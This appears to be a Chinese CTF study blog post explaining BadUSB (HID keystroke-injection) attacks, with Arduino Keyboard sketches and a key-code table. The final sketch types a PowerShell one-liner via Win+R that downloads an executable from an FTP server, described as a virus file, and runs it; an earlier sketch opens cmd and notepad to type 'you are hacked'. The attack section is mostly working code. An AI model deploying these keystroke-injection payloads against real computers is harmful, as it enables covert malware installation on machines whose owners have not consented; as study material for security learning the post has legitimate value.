CTF学习笔记（大学篇）02 —— BadUSB & CobaltStrike

1092 字

5 分钟

CTF学习笔记（大学篇）02 —— BadUSB & CobaltStrike

2022-04-16

CTF

/

HID

/

CobaltStrike

/

Powershell

HID设备#

人类接口设备，就是直接与人类进行交互的设备（鼠标、键盘之类的）

HID攻击#

插入一定的设备，设备有一定的标识符（例如Keyboard、Mouse），插入后就可以运行烧录在BadUSB上的指令来输入恶意代码，把木马植入计算机之中。（伪造用户击键行为等）

USB HID攻击 VS 摆渡攻击#

前者运用的是伪造的HID设备执行恶意代码，摆渡攻击是在U盘等设备放置木马程序，隐藏在存储介质之中。

USB HID攻击特点#

隐蔽性强
攻击范围广
权限高

攻击范围是只要能够支持USB HID接口协议的设备均可用。

相关编程语句#

默认内容#

1
void setup() {
2

3
}
4

5
void loop() {
6

7
}

void setup()函数内的代码只运行一次
void loop()函数内的代码会一直循环运行

运行cmd并打开记事本，输入相关内容#

1
#include<Keyboard.h>
2
void setup() {
3
  // put your setup code here, to run once:
4
Keyboard.begin();
5
delay(1000);
6

7
Keyboard.press(KEY_LEFT_GUI);//win键
8
delay(500);
9
Keyboard.press('r');//r键
10
delay(500);
11
Keyboard.release(KEY_LEFT_GUI);//win键释放
12
Keyboard.release('r');//r键释放
13

14
Keyboard.press(KEY_CAPS_LOCK);//若目标机开启大小写，关掉即可
15
Keyboard.release(KEY_CAPS_LOCK);//若目标机没有开启，也不影响
16
delay(500);
17
Keyboard.println("cmd");
18
Keyboard.press(KEY_RETURN);
19
Keyboard.release(KEY_RETURN);//目标机开启中文或开启大小写键
20
delay(500);
21

22
//弹出记事本
23
Keyboard.println("notepad.exe");
24
delay(500);
25
delay(500);//可防止丢帧
26
Keyboard.println("you are hacked!!!");
27
Keyboard.println("you are hacked!!!");
28
Keyboard.println("you are hacked!!!");
29
Keyboard.press(KEY_CAPS_LOCK);//若目标机开启大小写，关掉即可
30
Keyboard.release(KEY_CAPS_LOCK);
31
Keyboard.end();//结束键盘通讯
32
}
33

34
void loop() {
35
  // put your main code here, to run repeatedly:
36
}

Keyboard.press就表示按下按键，用Keyboard.release松开
KEY_LEFT_GUI表示左边的Win按键
Keyboard.begin()开启键盘通讯，Keyboard.end()来表示结束
因为插入设备的时候目标主机可能处于中文输入法，所以用Keyboard.press(KEY_CAPS_LOCK)打开大小写锁定，然后来输入命令，这样输入的就是英文字符而不受到中文输入法的限制了，输入完了以后记得用Keyboard.release(KEY_CAPS_LOCK)松开
Keyboard.begin()下面的delay(1000)：一般来说，设备插入后计算机需要启动驱动，在这里加入延迟就是为了给计算机启动驱动的时间（甚至是安装驱动，diss一下win7以下的那堆），当然一般是3秒5秒，1秒还是太短了
按键的定义如下（键盘按键+编码）

1
///Alt和Ctrl和Shift
2
#define KEY_LEFT_CTRL   0x80
3
#define KEY_LEFT_SHIFT    0x81
4
#define KEY_LEFT_ALT    0x82
5
#define KEY_LEFT_GUI    0x83
6
#define KEY_RIGHT_CTRL    0x84
7
#define KEY_RIGHT_SHIFT   0x85
8
#define KEY_RIGHT_ALT   0x86
9
#define KEY_RIGHT_GUI   0x87
10
///方向键系列
11
#define KEY_UP_ARROW    0xDA
12
#define KEY_DOWN_ARROW    0xD9
13
#define KEY_LEFT_ARROW    0xD8
14
#define KEY_RIGHT_ARROW   0xD7
15
//特殊键位，其中RETURN就是回车
16
#define KEY_BACKSPACE   0xB2
17
#define KEY_TAB       0xB3
18
#define KEY_RETURN      0xB0
19
#define KEY_ESC       0xB1
20
///特殊键位，我比较常用的是DELETE
21
#define KEY_INSERT      0xD1
22
#define KEY_DELETE      0xD4
23
#define KEY_PAGE_UP     0xD3
24
#define KEY_PAGE_DOWN   0xD6
25
#define KEY_HOME      0xD2
26
#define KEY_END       0xD5
27
#define KEY_CAPS_LOCK   0xC1
28
///F区的这些那些
29
#define KEY_F1        0xC2
30
#define KEY_F2        0xC3
31
#define KEY_F3        0xC4
32
#define KEY_F4        0xC5
33
#define KEY_F5        0xC6
34
#define KEY_F6        0xC7
35
#define KEY_F7        0xC8
36
#define KEY_F8        0xC9
37
#define KEY_F9        0xCA
38
#define KEY_F10       0xCB
39
#define KEY_F11       0xCC
40
#define KEY_F12       0xCD
41
#define KEY_F13       0xF0
42
#define KEY_F14       0xF1
43
#define KEY_F15       0xF2
44
#define KEY_F16       0xF3
45
#define KEY_F17       0xF4
46
#define KEY_F18       0xF5
47
#define KEY_F19       0xF6
48
#define KEY_F20       0xF7
49
#define KEY_F21       0xF8
50
#define KEY_F22       0xF9
51
#define KEY_F23       0xFA
52
#define KEY_F24       0xFB

利用FTP服务器存储病毒文件，利用BadUSB执行下载命令后运行#

1
#include "Keyboard.h"
2

3
void setup()
4
{
5
  Keyboard.begin();
6
  delay(2000);
7
  Keyboard.press(KEY_LEFT_GUI);//win键
8
  delay(500);
9
  Keyboard.press('r');//r键
10
  delay(500);
11
  Keyboard.release(KEY_LEFT_GUI); //win键 释放
12
  Keyboard.release('r'); //r键 释放
13
  delay(500);
14
  Keyboard.println("powershell $p=new-object system.net.webclient;$p.downloadfile('FTP://admin:123456@169.254.202.247/calc.exe','F:\\calc.exe');START F:\\calc.exe");
15
  Keyboard.end();//结束键盘通讯
16
}
17

18
void loop()
19
{
20
}